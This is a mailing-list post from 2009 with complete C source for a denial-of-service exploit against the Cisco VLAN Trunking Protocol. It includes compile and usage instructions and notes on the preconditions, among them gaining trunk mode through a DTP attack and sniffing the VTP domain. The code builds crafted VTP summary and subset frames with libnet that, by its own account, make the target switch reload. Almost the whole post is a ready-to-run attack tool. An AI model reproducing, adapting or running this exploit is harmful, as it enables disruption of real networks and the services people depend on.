DoS code for Cisco VLAN Trunking Protocol Vulnerability

Wed, 14 Jan 2009 09:59:43 -0800 

/*DoS code for Cisco VLAN Trunking Protocol Vulnerability

 *

 *vulerability discription:

 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

 *

 *To Known:

 * 1.the switch must in Server/Client Mode.

 * 2.the port ,attacker connected,must be in trunk Mode.

 *   Cisco Ethernet ports with no configuration are not

 *   in trunk.but trunk mode can be obtained through DTP

 *   attack by Yersinia.

 * 3.you must known the vtp domain,this can be sniffed

 * 4.some codes are from Yersinia.

 *

 *Result:

 * switch reload.

 *

 *

 *Compile:

 * gcc -o vtp `libnet-config --libs` vtp.c

 *

 *Usage:vtp -i <interface> -d <vtp_domain>

 *

 *Contact: showrun.lee[AT]gmail.com

 *http://sh0wrun.blogspot.com/

 */

#include <libnet.h>

#include <stdio.h>

#include <stdlib.h>



#define VTP_DOMAIN_SIZE    32

#define VTP_TIMESTAMP_SIZE 12



struct vtp_summary {

     u_int8_t  version;

     u_int8_t  code;

     u_int8_t  followers;

     u_int8_t  dom_len;

     u_int8_t  domain[VTP_DOMAIN_SIZE];

     u_int32_t revision;

     u_int32_t updater;

     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];

     u_int8_t  md5[16];

};



struct vtp_subset {

     u_int8_t  version;

     u_int8_t  code;

     u_int8_t  seq;

     u_int8_t  dom_len;

     u_int8_t  domain[VTP_DOMAIN_SIZE];

     u_int32_t revision;

};



void usage( char *s) {

    printf("%s -i <interface> -d <vtp domain>\n",s);

    exit (1);

}



int main( int argc, char *argv[] )

{

    int opt,k=0;

    extern char *optarg;

    libnet_ptag_t t;

    libnet_t *lhandler;

    u_int32_t vtp_len=0, sent;

    struct vtp_summary *vtp_summ;

    struct vtp_subset *vtp_sub;

    u_int8_t *vtp_packet,*vtp_packet2, *aux;

    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };

    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };

    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };

    struct libnet_ether_addr *mymac;

    char *device;

    char error_information[LIBNET_ERRBUF_SIZE];

    char *domain;



// get options

     while ((opt = getopt(argc, argv, "i:d:")) != -1)

     {

          switch (opt) {

          case 'i':

          device=malloc(strlen(optarg));

          strcpy(device,optarg);

      k=1;

          break;



          case 'd':

          domain=malloc(strlen(optarg));

          strcpy(domain,optarg);

          break;

         

          default: usage(argv[0]);

          }

     }

     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the 
interface\n",argv[0]);exit(1);}



//init libnet



    lhandler=libnet_init(LIBNET_LINK,device,error_information);

    if (!lhandler) {

             fprintf(stderr, "libnet_init: %s\n", error_information);

             return -1;

     }



    mymac=libnet_get_hwaddr(lhandler);

//build the first packet for vtp_summary

    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);

    vtp_packet = calloc(1,vtp_len);

    aux = vtp_packet;

    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));

    aux+=sizeof(cisco_data);

    vtp_summ = (struct vtp_summary *)aux;

    vtp_summ->version = 0x01;

    vtp_summ->code = 0x01;//vtp_summary

    vtp_summ->followers = 0x01;

    vtp_summ->dom_len = strlen(domain);

    memcpy(vtp_summ->domain,domain,strlen(domain));

    vtp_summ->revision = htonl(2000);//bigger than the current revision number 
will ok

    t = libnet_build_802_2(

        0xaa,            /* DSAP */

        0xaa,            /* SSAP */

        0x03,            /* control */

        vtp_packet,      /* payload */

        vtp_len,         /* payload size */

        lhandler,        /* libnet handle */

        0);              /* libnet id */

    t = libnet_build_802_3(

        dst_mac,       /* ethernet destination */

        mymac->ether_addr_octet,     /* ethernet source */

        LIBNET_802_2_H + vtp_len, /* frame size */

        NULL,                     /* payload */

        0,                        /* payload size */

        lhandler,                 /* libnet handle */

        0);                       /* libnet id */



     sent = libnet_write(lhandler);



     if (sent == -1) {

        libnet_clear_packet(lhandler);

        free(vtp_packet);

        return -1;

     }

     libnet_clear_packet(lhandler);

    

//build the second vtp packet for vtp_subset

     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);

     vtp_packet2 = calloc(1,vtp_len);

     aux = vtp_packet2;

     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));

     aux+=sizeof(cisco_data);

    

     vtp_sub = (struct vtp_subset *)aux;

     vtp_sub->version = 0x01;

     vtp_sub->code = 0x02; //vtp_subset

     vtp_sub->seq = 0x01;

     vtp_sub->dom_len = strlen(domain);

     memcpy(vtp_sub->domain,domain,strlen(domain));

     vtp_sub->revision = htonl(2000);//bigger than the current revision number 
will ok

//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));

    

    t = libnet_build_802_2(

        0xaa,            /* DSAP */

        0xaa,            /* SSAP */

        0x03,            /* control */

        vtp_packet2,      /* payload */

        vtp_len,         /* payload size */

        lhandler,        /* libnet handle */

        0);              /* libnet id */

    t = libnet_build_802_3(

        dst_mac,       /* ethernet destination */

        mymac->ether_addr_octet,     /* ethernet source */

        LIBNET_802_2_H + vtp_len, /* frame size */

        NULL,                     /* payload */

        0,                        /* payload size */

        lhandler,                 /* libnet handle */

        0);                       /* libnet id */



     sent = libnet_write(lhandler);

     if (sent == -1) {

        libnet_clear_packet(lhandler);

        free(vtp_packet);

        return -1;

     }

     libnet_clear_packet(lhandler);

}

Reply via email to